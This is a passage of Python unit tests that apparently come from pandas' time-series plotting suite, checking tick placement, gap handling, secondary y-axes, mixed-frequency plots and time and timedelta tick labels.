rs2.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs1 == xpl1
assert rs2 == xpl2
def test_finder_monthly(self):
yrs = [1.15, 2.5, 4, 11]
xpl1 = xpl2 = [Period("Jan 1988").ordinal] * len(yrs)
rs1 = []
rs2 = []
for n in yrs:
rng = period_range("1987Q2", periods=int(n * 12), freq="M")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs1.append(xaxis.get_majorticklocs()[0])
vmin, vmax = ax.get_xlim()
ax.set_xlim(vmin + 0.9, vmax)
rs2.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs1 == xpl1
assert rs2 == xpl2
def test_finder_monthly_long(self):
rng = period_range("1988Q1", periods=24 * 12, freq="M")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs = xaxis.get_majorticklocs()[0]
xp = Period("1989Q1", "M").ordinal
assert rs == xp
def test_finder_annual(self):
xp = [1987, 1988, 1990, 1990, 1995, 2020, 2070, 2170]
xp = [Period(x, freq="A").ordinal for x in xp]
rs = []
for nyears in [5, 10, 19, 49, 99, 199, 599, 1001]:
rng = period_range("1987", periods=nyears, freq="A")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs == xp
def test_finder_minutely(self):
nminutes = 50 * 24 * 60
rng = date_range("1/1/1999", freq="Min", periods=nminutes)
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs = xaxis.get_majorticklocs()[0]
xp = Period("1/1/1999", freq="Min").ordinal
assert rs == xp
def test_finder_hourly(self):
nhours = 23
rng = date_range("1/1/1999", freq="H", periods=nhours)
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs = xaxis.get_majorticklocs()[0]
xp = Period("1/1/1999", freq="H").ordinal
assert rs == xp
def test_gaps(self):
ts = tm.makeTimeSeries()
ts[5:25] = np.nan
_, ax = self.plt.subplots()
ts.plot(ax=ax)
lines = ax.get_lines()
assert len(lines) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[5:25, 1].all()
self.plt.close(ax.get_figure())
# irregular
ts = tm.makeTimeSeries()
ts = ts[[0, 1, 2, 5, 7, 9, 12, 15, 20]]
ts[2:5] = np.nan
_, ax = self.plt.subplots()
ax = ts.plot(ax=ax)
lines = ax.get_lines()
assert len(lines) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[2:5, 1].all()
self.plt.close(ax.get_figure())
# non-ts
idx = [0, 1, 2, 5, 7, 9, 12, 15, 20]
ser = Series(np.random.randn(len(idx)), idx)
ser[2:5] = np.nan
_, ax = self.plt.subplots()
ser.plot(ax=ax)
lines = ax.get_lines()
assert len(lines) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[2:5, 1].all()
def test_gap_upsample(self):
low = tm.makeTimeSeries()
low[5:25] = np.nan
_, ax = self.plt.subplots()
low.plot(ax=ax)
idxh = date_range(low.index[0], low.index[-1], freq="12h")
s = Series(np.random.randn(len(idxh)), idxh)
s.plot(secondary_y=True)
lines = ax.get_lines()
assert len(lines) == 1
assert len(ax.right_ax.get_lines()) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[5:25, 1].all()
def test_secondary_y(self):
ser = Series(np.random.randn(10))
ser2 = Series(np.random.randn(10))
fig, _ = self.plt.subplots()
ax = ser.plot(secondary_y=True)
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
axes = fig.get_axes()
line = ax.get_lines()[0]
xp = Series(line.get_ydata(), line.get_xdata())
tm.assert_series_equal(ser, xp)
assert ax.get_yaxis().get_ticks_position() == "right"
assert not axes[0].get_yaxis().get_visible()
self.plt.close(fig)
_, ax2 = self.plt.subplots()
ser2.plot(ax=ax2)
assert ax2.get_yaxis().get_ticks_position() == self.default_tick_position
self.plt.close(ax2.get_figure())
ax = ser2.plot()
ax2 = ser.plot(secondary_y=True)
assert ax.get_yaxis().get_visible()
assert not hasattr(ax, "left_ax")
assert hasattr(ax, "right_ax")
assert hasattr(ax2, "left_ax")
assert not hasattr(ax2, "right_ax")
def test_secondary_y_ts(self):
idx = date_range("1/1/2000", periods=10)
ser = Series(np.random.randn(10), idx)
ser2 = Series(np.random.randn(10), idx)
fig, _ = self.plt.subplots()
ax = ser.plot(secondary_y=True)
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
axes = fig.get_axes()
line = ax.get_lines()[0]
xp = Series(line.get_ydata(), line.get_xdata()).to_timestamp()
tm.assert_series_equal(ser, xp)
assert ax.get_yaxis().get_ticks_position() == "right"
assert not axes[0].get_yaxis().get_visible()
self.plt.close(fig)
_, ax2 = self.plt.subplots()
ser2.plot(ax=ax2)
assert ax2.get_yaxis().get_ticks_position() == self.default_tick_position
self.plt.close(ax2.get_figure())
ax = ser2.plot()
ax2 = ser.plot(secondary_y=True)
assert ax.get_yaxis().get_visible()
@td.skip_if_no_scipy
def test_secondary_kde(self):
ser = Series(np.random.randn(10))
fig, ax = self.plt.subplots()
ax = ser.plot(secondary_y=True, kind="density", ax=ax)
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
axes = fig.get_axes()
assert axes[1].get_yaxis().get_ticks_position() == "right"
def test_secondary_bar(self):
ser = Series(np.random.randn(10))
fig, ax = self.plt.subplots()
ser.plot(secondary_y=True, kind="bar", ax=ax)
axes = fig.get_axes()
assert axes[1].get_yaxis().get_ticks_position() == "right"
def test_secondary_frame(self):
df = DataFrame(np.random.randn(5, 3), columns=["a", "b", "c"])
axes = df.plot(secondary_y=["a", "c"], subplots=True)
assert axes[0].get_yaxis().get_ticks_position() == "right"
assert axes[1].get_yaxis().get_ticks_position() == self.default_tick_position
assert axes[2].get_yaxis().get_ticks_position() == "right"
def test_secondary_bar_frame(self):
df = DataFrame(np.random.randn(5, 3), columns=["a", "b", "c"])
axes = df.plot(kind="bar", secondary_y=["a", "c"], subplots=True)
assert axes[0].get_yaxis().get_ticks_position() == "right"
assert axes[1].get_yaxis().get_ticks_position() == self.default_tick_position
assert axes[2].get_yaxis().get_ticks_position() == "right"
def test_mixed_freq_regular_first(self):
# TODO
s1 = tm.makeTimeSeries()
s2 = s1[[0, 5, 10, 11, 12, 13, 14, 15]]
# it works!
_, ax = self.plt.subplots()
s1.plot(ax=ax)
ax2 = s2.plot(style="g", ax=ax)
lines = ax2.get_lines()
idx1 = PeriodIndex(lines[0].get_xdata())
idx2 = PeriodIndex(lines[1].get_xdata())
tm.assert_index_equal(idx1, s1.index.to_period("B"))
tm.assert_index_equal(idx2, s2.index.to_period("B"))
left, right = ax2.get_xlim()
pidx = s1.index.to_period()
assert left <= pidx[0].ordinal
assert right >= pidx[-1].ordinal
def test_mixed_freq_irregular_first(self):
s1 = tm.makeTimeSeries()
s2 = s1[[0, 5, 10, 11, 12, 13, 14, 15]]
_, ax = self.plt.subplots()
s2.plot(style="g", ax=ax)
s1.plot(ax=ax)
assert not hasattr(ax, "freq")
lines = ax.get_lines()
x1 = lines[0].get_xdata()
tm.assert_numpy_array_equal(x1, s2.index.astype(object).values)
x2 = lines[1].get_xdata()
tm.assert_numpy_array_equal(x2, s1.index.astype(object).values)
def test_mixed_freq_regular_first_df(self):
# GH 9852
s1 = tm.makeTimeSeries().to_frame()
s2 = s1.iloc[[0, 5, 10, 11, 12, 13, 14, 15], :]
_, ax = self.plt.subplots()
s1.plot(ax=ax)
ax2 = s2.plot(style="g", ax=ax)
lines = ax2.get_lines()
idx1 = PeriodIndex(lines[0].get_xdata())
idx2 = PeriodIndex(lines[1].get_xdata())
assert idx1.equals(s1.index.to_period("B"))
assert idx2.equals(s2.index.to_period("B"))
left, right = ax2.get_xlim()
pidx = s1.index.to_period()
assert left <= pidx[0].ordinal
assert right >= pidx[-1].ordinal
def test_mixed_freq_irregular_first_df(self):
# GH 9852
s1 = tm.makeTimeSeries().to_frame()
s2 = s1.iloc[[0, 5, 10, 11, 12, 13, 14, 15], :]
_, ax = self.plt.subplots()
s2.plot(style="g", ax=ax)
s1.plot(ax=ax)
assert not hasattr(ax, "freq")
lines = ax.get_lines()
x1 = lines[0].get_xdata()
tm.assert_numpy_array_equal(x1, s2.index.astype(object).values)
x2 = lines[1].get_xdata()
tm.assert_numpy_array_equal(x2, s1.index.astype(object).values)
def test_mixed_freq_hf_first(self):
idxh = date_range("1/1/1999", periods=365, freq="D")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
high.plot(ax=ax)
low.plot(ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "D"
def test_mixed_freq_alignment(self):
ts_ind = date_range("2012-01-01 13:00", "2012-01-02", freq="H")
ts_data = np.random.randn(12)
ts = Series(ts_data, index=ts_ind)
ts2 = ts.asfreq("T").interpolate()
_, ax = self.plt.subplots()
ax = ts.plot(ax=ax)
ts2.plot(style="r", ax=ax)
assert ax.lines[0].get_xdata()[0] == ax.lines[1].get_xdata()[0]
def test_mixed_freq_lf_first(self):
idxh = date_range("1/1/1999", periods=365, freq="D")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(legend=True, ax=ax)
high.plot(legend=True, ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "D"
leg = ax.get_legend()
assert len(leg.texts) == 2
self.plt.close(ax.get_figure())
idxh = date_range("1/1/1999", periods=240, freq="T")
idxl = date_range("1/1/1999", periods=4, freq="H")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(ax=ax)
high.plot(ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "T"
def test_mixed_freq_irreg_period(self):
ts = tm.makeTimeSeries()
irreg = ts[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 16, 17, 18, 29]]
rng = period_range("1/3/2000", periods=30, freq="B")
ps = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
irreg.plot(ax=ax)
ps.plot(ax=ax)
def test_mixed_freq_shared_ax(self):
# GH13341, using sharex=True
idx1 = date_range("2015-01-01", periods=3, freq="M")
idx2 = idx1[:1].union(idx1[2:])
s1 = Series(range(len(idx1)), idx1)
s2 = Series(range(len(idx2)), idx2)
fig, (ax1, ax2) = self.plt.subplots(nrows=2, sharex=True)
s1.plot(ax=ax1)
s2.plot(ax=ax2)
assert ax1.freq == "M"
assert ax2.freq == "M"
assert ax1.lines[0].get_xydata()[0, 0] == ax2.lines[0].get_xydata()[0, 0]
# using twinx
fig, ax1 = self.plt.subplots()
ax2 = ax1.twinx()
s1.plot(ax=ax1)
s2.plot(ax=ax2)
assert ax1.lines[0].get_xydata()[0, 0] == ax2.lines[0].get_xydata()[0, 0]
# TODO (GH14330, GH14322)
# plotting the irregular first does not yet work
# fig, ax1 = plt.subplots()
# ax2 = ax1.twinx()
# s2.plot(ax=ax1)
# s1.plot(ax=ax2)
# assert (ax1.lines[0].get_xydata()[0, 0] ==
# ax2.lines[0].get_xydata()[0, 0])
def test_nat_handling(self):
_, ax = self.plt.subplots()
dti = DatetimeIndex(["2015-01-01", NaT, "2015-01-03"])
s = Series(range(len(dti)), dti)
s.plot(ax=ax)
xdata = ax.get_lines()[0].get_xdata()
# plot x data is bounded by index values
assert s.index.min() <= Series(xdata).min()
assert Series(xdata).max() <= s.index.max()
def test_to_weekly_resampling(self):
idxh = date_range("1/1/1999", periods=52, freq="W")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
high.plot(ax=ax)
low.plot(ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
def test_from_weekly_resampling(self):
idxh = date_range("1/1/1999", periods=52, freq="W")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(ax=ax)
high.plot(ax=ax)
expected_h = idxh.to_period().asi8.astype(np.float64)
expected_l = np.array(
[1514, 1519, 1523, 1527, 1531, 1536, 1540, 1544, 1549, 1553, 1558, 1562],
dtype=np.float64,
)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
xdata = line.get_xdata(orig=False)
if len(xdata) == 12: # idxl lines
tm.assert_numpy_array_equal(xdata, expected_l)
else:
tm.assert_numpy_array_equal(xdata, expected_h)
tm.close()
def test_from_resampling_area_line_mixed(self):
idxh = date_range("1/1/1999", periods=52, freq="W")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = DataFrame(np.random.rand(len(idxh), 3), index=idxh, columns=[0, 1, 2])
low = DataFrame(np.random.rand(len(idxl), 3), index=idxl, columns=[0, 1, 2])
# low to high
for kind1, kind2 in [("line", "area"), ("area", "line")]:
_, ax = self.plt.subplots()
low.plot(kind=kind1, stacked=True, ax=ax)
high.plot(kind=kind2, stacked=True, ax=ax)
# check low dataframe result
expected_x = np.array(
[
1514,
1519,
1523,
1527,
1531,
1536,
1540,
1544,
1549,
1553,
1558,
1562,
],
dtype=np.float64,
)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
line = ax.lines[i]
assert PeriodIndex(line.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(line.get_xdata(orig=False), expected_x)
# check stacked values are correct
expected_y += low[i].values
tm.assert_numpy_array_equal(line.get_ydata(orig=False), expected_y)
# check high dataframe result
expected_x = idxh.to_period().asi8.astype(np.float64)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
line = ax.lines[3 + i]
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(line.get_xdata(orig=False), expected_x)
expected_y += high[i].values
tm.assert_numpy_array_equal(line.get_ydata(orig=False), expected_y)
# high to low
for kind1, kind2 in [("line", "area"), ("area", "line")]:
_, ax = self.plt.subplots()
high.plot(kind=kind1, stacked=True, ax=ax)
low.plot(kind=kind2, stacked=True, ax=ax)
# check high dataframe result
expected_x = idxh.to_period().asi8.astype(np.float64)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
line = ax.lines[i]
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(line.get_xdata(orig=False), expected_x)
expected_y += high[i].values
tm.assert_numpy_array_equal(line.get_ydata(orig=False), expected_y)
# check low dataframe result
expected_x = np.array(
[
1514,
1519,
1523,
1527,
1531,
1536,
1540,
1544,
1549,
1553,
1558,
1562,
],
dtype=np.float64,
)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
lines = ax.lines[3 + i]
assert PeriodIndex(data=lines.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(lines.get_xdata(orig=False), expected_x)
expected_y += low[i].values
tm.assert_numpy_array_equal(lines.get_ydata(orig=False), expected_y)
def test_mixed_freq_second_millisecond(self):
# GH 7772, GH 7760
idxh = date_range("2014-07-01 09:00", freq="S", periods=50)
idxl = date_range("2014-07-01 09:00", freq="100L", periods=500)
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
# high to low
_, ax = self.plt.subplots()
high.plot(ax=ax)
low.plot(ax=ax)
assert len(ax.get_lines()) == 2
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "L"
tm.close()
# low to high
_, ax = self.plt.subplots()
low.plot(ax=ax)
high.plot(ax=ax)
assert len(ax.get_lines()) == 2
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "L"
def test_irreg_dtypes(self):
# date
idx = [date(2000, 1, 1), date(2000, 1, 5), date(2000, 1, 20)]
df = DataFrame(np.random.randn(len(idx), 3), Index(idx, dtype=object))
_check_plot_works(df.plot)
# np.datetime64
idx = date_range("1/1/2000", periods=10)
idx = idx[[0, 2, 5, 9]].astype(object)
df = DataFrame(np.random.randn(len(idx), 3), idx)
_, ax = self.plt.subplots()
_check_plot_works(df.plot, ax=ax)
def test_time(self):
t = datetime(1, 1, 1, 3, 30, 0)
deltas = np.random.randint(1, 20, 3).cumsum()
ts = np.array([(t + timedelta(minutes=int(x))).time() for x in deltas])
df = DataFrame(
{"a": np.random.randn(len(ts)), "b": np.random.randn(len(ts))}, index=ts
)
fig, ax = self.plt.subplots()
df.plot(ax=ax)
# verify tick labels
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if s != 0:
xp = time(h, m, s).strftime("%H:%M:%S")
else:
xp = time(h, m, s).strftime("%H:%M")
assert xp == rs
def test_time_change_xlim(self):
t = datetime(1, 1, 1, 3, 30, 0)
deltas = np.random.randint(1, 20, 3).cumsum()
ts = np.array([(t + timedelta(minutes=int(x))).time() for x in deltas])
df = DataFrame(
{"a": np.random.randn(len(ts)), "b": np.random.randn(len(ts))}, index=ts
)
fig, ax = self.plt.subplots()
df.plot(ax=ax)
# verify tick labels
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if s != 0:
xp = time(h, m, s).strftime("%H:%M:%S")
else:
xp = time(h, m, s).strftime("%H:%M")
assert xp == rs
# change xlim
ax.set_xlim("1:30", "5:00")
# check tick labels again
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if s != 0:
xp = time(h, m, s).strftime("%H:%M:%S")
else:
xp = time(h, m, s).strftime("%H:%M")
assert xp == rs
def test_time_musec(self):
t = datetime(1, 1, 1, 3, 30, 0)
deltas = np.random.randint(1, 20, 3).cumsum()
ts = np.array([(t + timedelta(microseconds=int(x))).time() for x in deltas])
df = DataFrame(
{"a": np.random.randn(len(ts)), "b": np.random.randn(len(ts))}, index=ts
)
fig, ax = self.plt.subplots()
ax = df.plot(ax=ax)
# verify tick labels
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
us = round((t - int(t)) * 1e6)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if (us % 1000) != 0:
xp = time(h, m, s, us).strftime("%H:%M:%S.%f")
elif (us // 1000) != 0:
xp = time(h, m, s, us).strftime("%H:%M:%S.%f")[:-3]
elif s != 0:
xp = time(h, m, s, us).strftime("%H:%M:%S")
else:
xp = time(h, m, s, us).strftime("%H:%M")
assert xp == rs
def test_secondary_upsample(self):
idxh = date_range("1/1/1999", periods=365, freq="D")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(ax=ax)
ax = high.plot(secondary_y=True, ax=ax)
for line in ax.get_lines():
assert PeriodIndex(line.get_xdata()).freq == "D"
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
for line in ax.left_ax.get_lines():
assert PeriodIndex(line.get_xdata()).freq == "D"
def test_secondary_legend(self):
fig = self.plt.figure()
ax = fig.add_subplot(211)
# ts
df = tm.makeTimeDataFrame()
df.plot(secondary_y=["A", "B"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert leg.get_texts()[0].get_text() == "A (right)"
assert leg.get_texts()[1].get_text() == "B (right)"
assert leg.get_texts()[2].get_text() == "C"
assert leg.get_texts()[3].get_text() == "D"
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
self.plt.close(fig)
fig = self.plt.figure()
ax = fig.add_subplot(211)
df.plot(secondary_y=["A", "C"], mark_right=False, ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert leg.get_texts()[0].get_text() == "A"
assert leg.get_texts()[1].get_text() == "B"
assert leg.get_texts()[2].get_text() == "C"
assert leg.get_texts()[3].get_text() == "D"
self.plt.close(fig)
fig, ax = self.plt.subplots()
df.plot(kind="bar", secondary_y=["A"], ax=ax)
leg = ax.get_legend()
assert leg.get_texts()[0].get_text() == "A (right)"
assert leg.get_texts()[1].get_text() == "B"
self.plt.close(fig)
fig, ax = self.plt.subplots()
df.plot(kind="bar", secondary_y=["A"], mark_right=False, ax=ax)
leg = ax.get_legend()
assert leg.get_texts()[0].get_text() == "A"
assert leg.get_texts()[1].get_text() == "B"
self.plt.close(fig)
fig = self.plt.figure()
ax = fig.add_subplot(211)
df = tm.makeTimeDataFrame()
ax = df.plot(secondary_y=["C", "D"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
self.plt.close(fig)
# non-ts
df = tm.makeDataFrame()
fig = self.plt.figure()
ax = fig.add_subplot(211)
ax = df.plot(secondary_y=["A", "B"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
self.plt.close()
fig = self.plt.figure()
ax = fig.add_subplot(211)
ax = df.plot(secondary_y=["C", "D"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
def test_format_date_axis(self):
rng = date_range("1/1/2012", periods=12, freq="M")
df = DataFrame(np.random.randn(len(rng), 3), rng)
_, ax = self.plt.subplots()
ax = df.plot(ax=ax)
xaxis = ax.get_xaxis()
for line in xaxis.get_ticklabels():
if len(line.get_text()) > 0:
assert line.get_rotation() == 30
def test_ax_plot(self):
x = date_range(start="2012-01-02", periods=10, freq="D")
y = list(range(len(x)))
_, ax = self.plt.subplots()
lines = ax.plot(x, y, label="Y")
tm.assert_index_equal(DatetimeIndex(lines[0].get_xdata()), x)
def test_mpl_nopandas(self):
dates = [date(2008, 12, 31), date(2009, 1, 31)]
values1 = np.arange(10.0, 11.0, 0.5)
values2 = np.arange(11.0, 12.0, 0.5)
kw = {"fmt": "-", "lw": 4}
_, ax = self.plt.subplots()
ax.plot_date([x.toordinal() for x in dates], values1, **kw)
ax.plot_date([x.toordinal() for x in dates], values2, **kw)
line1, line2 = ax.get_lines()
exp = np.array([x.toordinal() for x in dates], dtype=np.float64)
tm.assert_numpy_array_equal(line1.get_xydata()[:, 0], exp)
exp = np.array([x.toordinal() for x in dates], dtype=np.float64)
tm.assert_numpy_array_equal(line2.get_xydata()[:, 0], exp)
def test_irregular_ts_shared_ax_xlim(self):
# GH 2960
from pandas.plotting._matplotlib.converter import DatetimeConverter
ts = tm.makeTimeSeries()[:20]
ts_irregular = ts[[1, 4, 5, 6, 8, 9, 10, 12, 13, 14, 15, 17, 18]]
# plot the left section of the irregular series, then the right section
_, ax = self.plt.subplots()
ts_irregular[:5].plot(ax=ax)
ts_irregular[5:].plot(ax=ax)
# check that axis limits are correct
left, right = ax.get_xlim()
assert left <= DatetimeConverter.convert(ts_irregular.index.min(), "", ax)
assert right >= DatetimeConverter.convert(ts_irregular.index.max(), "", ax)
def test_secondary_y_non_ts_xlim(self):
# GH 3490 - non-timeseries with secondary y
index_1 = [1, 2, 3, 4]
index_2 = [5, 6, 7, 8]
s1 = Series(1, index=index_1)
s2 = Series(2, index=index_2)
_, ax = self.plt.subplots()
s1.plot(ax=ax)
left_before, right_before = ax.get_xlim()
s2.plot(secondary_y=True, ax=ax)
left_after, right_after = ax.get_xlim()
assert left_before >= left_after
assert right_before < right_after
def test_secondary_y_regular_ts_xlim(self):
# GH 3490 - regular-timeseries with secondary y
index_1 = date_range(start="2000-01-01", periods=4, freq="D")
index_2 = date_range(start="2000-01-05", periods=4, freq="D")
s1 = Series(1, index=index_1)
s2 = Series(2, index=index_2)
_, ax = self.plt.subplots()
s1.plot(ax=ax)
left_before, right_before = ax.get_xlim()
s2.plot(secondary_y=True, ax=ax)
left_after, right_after = ax.get_xlim()
assert left_before >= left_after
assert right_before < right_after
def test_secondary_y_mixed_freq_ts_xlim(self):
# GH 3490 - mixed frequency timeseries with secondary y
rng = date_range("2000-01-01", periods=10000, freq="min")
ts = Series(1, index=rng)
_, ax = self.plt.subplots()
ts.plot(ax=ax)
left_before, right_before = ax.get_xlim()
ts.resample("D").mean().plot(secondary_y=True, ax=ax)
left_after, right_after = ax.get_xlim()
# a downsample should not have changed either limit
assert left_before == left_after
assert right_before == right_after
def test_secondary_y_irregular_ts_xlim(self):
# GH 3490 - irregular-timeseries with secondary y
from pandas.plotting._matplotlib.converter import DatetimeConverter
ts = tm.makeTimeSeries()[:20]
ts_irregular = ts[[1, 4, 5, 6, 8, 9, 10, 12, 13, 14, 15, 17, 18]]
_, ax = self.plt.subplots()
ts_irregular[:5].plot(ax=ax)
# plot higher-x values on secondary axis
ts_irregular[5:].plot(secondary_y=True, ax=ax)
# ensure secondary limits aren't overwritten by plot on primary
ts_irregular[:5].plot(ax=ax)
left, right = ax.get_xlim()
assert left <= DatetimeConverter.convert(ts_irregular.index.min(), "", ax)
assert right >= DatetimeConverter.convert(ts_irregular.index.max(), "", ax)
def test_plot_outofbounds_datetime(self):
# 2579 - checking this does not raise
values = [date(1677, 1, 1), date(1677, 1, 2)]
_, ax = self.plt.subplots()
ax.plot(values)
values = [datetime(1677, 1, 1, 12), datetime(1677, 1, 2, 12)]
ax.plot(values)
def test_format_timedelta_ticks_narrow(self):
expected_labels = [f"00:00:00.0000000{i:0>2d}" for i in np.arange(10)]
rng = timedelta_range("0", periods=10, freq="ns")
df = DataFrame(np.random.randn(len(rng), 3), rng)
fig, ax = self.plt.subplots()
df.plot(fontsize=2, ax=ax)
self.plt.draw()
labels = ax.get_xticklabels()
result_labels = [x.get_text() for x in labels]
assert len(result_labels) == len(expected_labels)
assert result_labels == expected_labels
def test_format_timedelta_ticks_wide(self):
expected_labels = [
"00:00:00",
"1 days 03:46:40",
"2 days 07:33:20",
"3 days 11:20:00",
"4 days 15:06:40",
"5 days 18:53:20",
"6 days 22:40:00",
"8 days 02:26:40",
"9 days 06:13:20",
]
rng = timedelta_range("0", periods=10, freq="1 d")
df = DataFrame(np.random.randn(len(rng), 3), rng)
fig, ax = self.plt.subplots()
ax = df.plot(fontsize=2, ax=ax)
self.plt.draw()
labels = ax.get_xticklabels()
result_labels = [x.get_text() for x in labels]
assert len(result_labels) == len(expected_labels)
assert result_labels == expected_labels
def test_timedelta_plot(self):
# test issue #8711
s = Series(range(5), timedelta_range("1day", periods=5))
_, ax = self.plt.subplots()
_check_plot_works(s.plot, ax=ax)
# test long period
index = timedelta_range("1 day 2 hr 30 min 10 s", periods=10, freq="1 d")
s = Series(np.random.randn(len(index)), index)
_, ax = self.plt.subplots()
_check_plot_works(s.plot, ax=ax)
# test short period
index = timedelta_range("1 day 2 hr 30 min 10 s", periods=10, freq="1 ns")
s = Series(np.random.randn(len(index)), index)
_, ax = self.plt.subplots()
_check_plot_works(s.plot, ax=ax)
def test_hist(self):
# https://github.com/matplotlib/matplotlib/issues/8459
rng = date_range("1/1/2011", periods=10, freq="H")
x = rng
w1 = np.arange(0, 1, 0.1)
w2 = np.arange(0, 1, 0.1)[::-1]
_, ax = self.plt.subplots()
ax.hist([x, x], weights=[w1, w2])
def test_overlapping_datetime(self):
# GB 6608
s1 = Series(
[1, 2, 3],
index=[
datetime(1995, 12, 31),
datetime(2000, 12, 31),
datetime(2005, 12, 31),
],
)
s2 = Series(
[1, 2, 3],
index=[
datetime(1997, 12, 31),
datetime(2003, 12, 31),
datetime(2008, 12, 31),
],
)
# plot first series, then add the second series to those axes,
# then try adding the first series again
_, ax = self.plt.subplots()
s1.plot(ax=ax)
s2.plot(ax=ax)
s1.plot(ax=ax)
@pytest.mark.xfail(reason="GH9053 matplotlib does not use ax.xaxis.converter")
def test_add_matplotlib_datetime64(self):
